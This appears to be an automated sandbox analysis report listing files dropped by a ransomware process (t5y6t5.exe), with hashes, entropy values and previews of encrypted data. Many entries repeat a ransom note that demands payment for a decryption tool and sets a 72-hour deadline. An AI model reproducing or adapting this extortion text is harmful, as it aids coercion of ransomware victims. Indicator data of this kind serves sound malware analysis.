                                                                                            Preview:H\`&....?V2..Uk".p.r..X. ^..\o....r.....l.q...}...U...&.e.%~!D...X.t/.Z...2....ci.fn.......X......_6<.+..41.E..F...!-.6N..kV..s...<..R.|E...$.n/.K..7,#a.$.d.....K...=.d.H.Z-.6k]W....Gn..T._^R.\~C.V..Eg..dJ.G...F.aN8...>...:..\.n.H.s.zC6.G$PzL87f4...~...7xVg....,.C.HA..|.~.7...TZ.%r..Is.#.4.%.ec.I...P...C.......+....bzo..h,6..~.a.Q.y...].........eY..f....Q.....@.........<f.?..Ie...;.....6..e.Go...L.#.iU....v.......A|J..'..BS...Xj.....Y[DxR..?..vf.....F,1Ud..N[.K.).o...vz~...a...On..oA..H....V..82~.6\..@.?!..(.j...7....h..{Y.%..+1#q..z].Lf.....J..>.p........A....*..`./?u.#.e......n...I4.~..|..1C..~.u.$..Z.g..,....&jh.. .....Utw.i8...?..p?...sD7j.8..M..........M1q.%U.....,1..c$......%.p.g.x..6...w)Z..GJ..c.T..AlO.........\.~..i...|4.....`L.S.\..+<._.p...^..o.X[,H...8o.+..,.l.xc3:.r`z.......N.4q..)qj.~....X....N../.'mu.-......\...O.S......j..R..uhX.Ih...[......t..&....@....~....r.H#C........zS..3.c....).....s.._j...^.. .B..Dd...2ySjv.!.,.'.r
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):524554
                                                                                            Entropy (8bit):0.13488697024611124
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Kp2MJuffIHIYeY3siJx7n6kcboj6uJ5Fz8XSplWEStAqksBQRtS17RO3:KNgwo/Y37xukcbI5FhLctVfQAO3
                                                                                            MD5:4A5BBCDE7F486FDA18EB3860D8A5CE0E
                                                                                            SHA1:C8950DC4B610B75C284336F36C6CC75333BF6C03
                                                                                            SHA-256:51B48B434A8786D6E093A9469380F1821DE3B51B443FE60EC24E4D19B9ECC13C
                                                                                            SHA-512:D3A53F4E71EC743F88F00982E77E441934F6F882BE8DDC70E4FFBB346F68D15AD64166B6D03056FD2F5D38C7F2C7EB1A69CEAEA118E7588033F3650A662E3E9E
                                                                                            Malicious:false
                                                                                            Preview:H.y..r.N. js.,AJ........C..^.q........;.K.q..G..y..L4c....8.G.S{..Xl......z..i...pG.\.y..bi.......Md....)F-.mA..Z'P.&.Bc3..D&Ho.w.Qn..]lzj..^."........I.h.(.....c.{._0F-.*.bDlrc...r20h.........R..v...i.2|x.)<".`.-P.....3..}a.....bD..4%4+.O.j..hP`D...Q.Z.e.%.>.Jb..n..!.....8.-e.rX...X.E...ur"..0=......MfJ/W29h....v..........E....c.<a.{.cfu1z9..A.o.k..\.F.b^..^.Q..e..{`.o7..&./.5NTB..H..}=c.+=;....&.n.Z..}|...3......E8..G.(..el+..["X...UX,%......B../4%H.O.rP..pj..).J-.-..F,...x+..V...WH...q.p/..%.?.....P[.[s....NCvUz....>~...R.K.@....'.z..$......&,.*..G...z-GK:..J...c)..-. ..$v._..,.%........).#[...F...>....a......O..7..E.......f...KLd.B........s.;..HL..2.4.5..=..I.s.5.5:..n:.N"..<..c...W.w...&.]..%.........w...\..&D.i...@pX...F....PX.6..N.{...D..H...:^.c...]..E......\e.Ff.}u....<V..9.!...i.".e..,..i...Kn5...wv.+O..........blQ.*-<E..$!~.$... /.._.A%25T.....GK.a....v!r.."...Pd..-..!.x......g.RYZ..@4.l.)....N.(..W..X.."y..7....Q*'5...}./.....`^O
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):524554
                                                                                            Entropy (8bit):0.13502543675525597
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:9Stqb63Vg6GR88fmrkEcM50IOje5zcX+hTUlUWahrKbM7s2:98s6FhG+mukE7S6WaDB
                                                                                            MD5:A4DA6148B46961524C5E7BBC67C7F35C
                                                                                            SHA1:2A75F83AAFACF0137ED0D42F9DA6C7027C8F4D10
                                                                                            SHA-256:74438437F02A4B3B02E2A903D0A777EFDF6B6DBD8BB35933C433D62582C61D65
                                                                                            SHA-512:BE69BBE366C857914936CEC091CD8CD7BE4471F7D9B35DECFED8E5A303C2D150A100E63BF3F9EE21365F3A9125A921D4DE010E6907893EDE2821CA99E30ACB41
                                                                                            Malicious:false
                                                                                            Preview:..U........Bw"xh.u........ `....3.e.l..c.".,.}#...Cf.#.....B.$....z'..eYq..>vU.UwN..t.FT*.7....+WwNqk+f...fB....oH...~...}.r263(~......?$......1.D....]..s.D...G.>-g..Ng..^.%.M.-.U.1..gJ......GaB&...4Y W.{,..r..M.....u/v8L..o..U .#...XC..s.?...Z.?...1...>u.<.V..^.......+Z.....DX>2.....s.........s.I3K.Yn(..:oi.f.z....<.?.u@..>#.vhzU8l.....H|..9@]."......k.9...$..x.P......iN....M.X.8...U....I.5...3..}..:.G|...P"[+....z.h9.B..<`.Bc.. ....[...:eM.q......^F.5M...x0....w.9...R....Sl.2..g.6.....@...U.C......".*....A....0..>..).WH.D:.FBd..S........:..J.Dg.x..b.."T..h..m..........n.E......d\V.$...w.`z.m.....,..=.r}4.\M..l.0.D...C...z.8....W......O...?>1..}kA...ic.qM..Z. U....2.7I...fY.O.}.?..M.1..k/....0%....;T.h.&=?...W..e......bj\..0$U.v...C.I........8.`.6...B.{I......&.{M..f.TKg....P..,........J...v..v.+........G...+R..F~......>8X<h.|.2.)PD>]../..W.\ns.4.a.E..b...i[..m....}{m...i...Y..R3..C. x.4@..)p#(...wN.,...gr..r.....skT%.o....R.[...28.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1265
                                                                                            Entropy (8bit):7.8383135055594115
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:bhVeovMnmGDXa62I7b56fF6nNMet/I1as8Wxnzg9gJIbO2bBv78su:tB8mu+I7b5YFg5oaOnzg+F2tT81
                                                                                            MD5:844DAEA8873BA9F878398C402BBE022E
                                                                                            SHA1:1A92AAAFA0CB498FE3E398D37929BA11461B5799
                                                                                            SHA-256:8DDCB088895FD71DB328AA8FDB4562D00A7FB11FDE6C4754462BA7D3FFDE3390
                                                                                            SHA-512:8AA82792E42C4501115A419A4580F90A971D6B9402C81F7D02F6CA4269B11F4589B2DB0C99579D39121C5E193419C87480D5CEE5066988F95F04CC8B228FEFC3
                                                                                            Malicious:false
                                                                                            Preview:..?..tC.`.......r1.....f.....Y.L9...TI.....up.QL|6-(......)I..cr.2$. ....c.T..P...W.e..h4..|..4.W...A.=#.r.b+%8Xj.....7-.N.N.frS..W..8 ..||.....$YE.iy.;\..x....e.....%..Z.'....K.5...+.,7 w.$7...NI.Djl.8..o....#S.C=.>.....ev.%...k7=......&...9.....%^.Ar%.7..2..gk...H8....._.?.m.M....@....P[[.....U....5.....d.AY....Ah........bjN.#.I.I.ih4..s.K.W......W..L"...V..Nj...E..(o..CW.p.Y..!+...Aki.....#.t.bv._.Z..l..(..~.0L.....x.m..o;C....V....X/...z.V.....<.q..I^..0.RH@.B.3...K..,..o...r...z......... u\Y..7..r.a..1..-v..Ms..]{@....3...i....<y.....f..u8.#....O.../...MWO%V.CnB..=....:..C2;....X.P].m\H....~.G.CE..B........$..P..bn'e....CrS9{he.#3.c.P.........U...3a.H.O9.>..].Ro........o.}.)`ze....|..".D>...W_%..b......&.aI....[C... .Go<.}.....0A....YY.b........0..CK..E.%4.~.U..Za...v..3.6P6.....l....i.q.H.`...[...PZ+..2..~..1?.M.......<}u. q+....._.e]m.u..]..v.w!g.|....^.ZD.G....`..4...?a.to..8..b!..|i..`.c.y...L.\.|........\i.PE.".N.**....qtion>...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
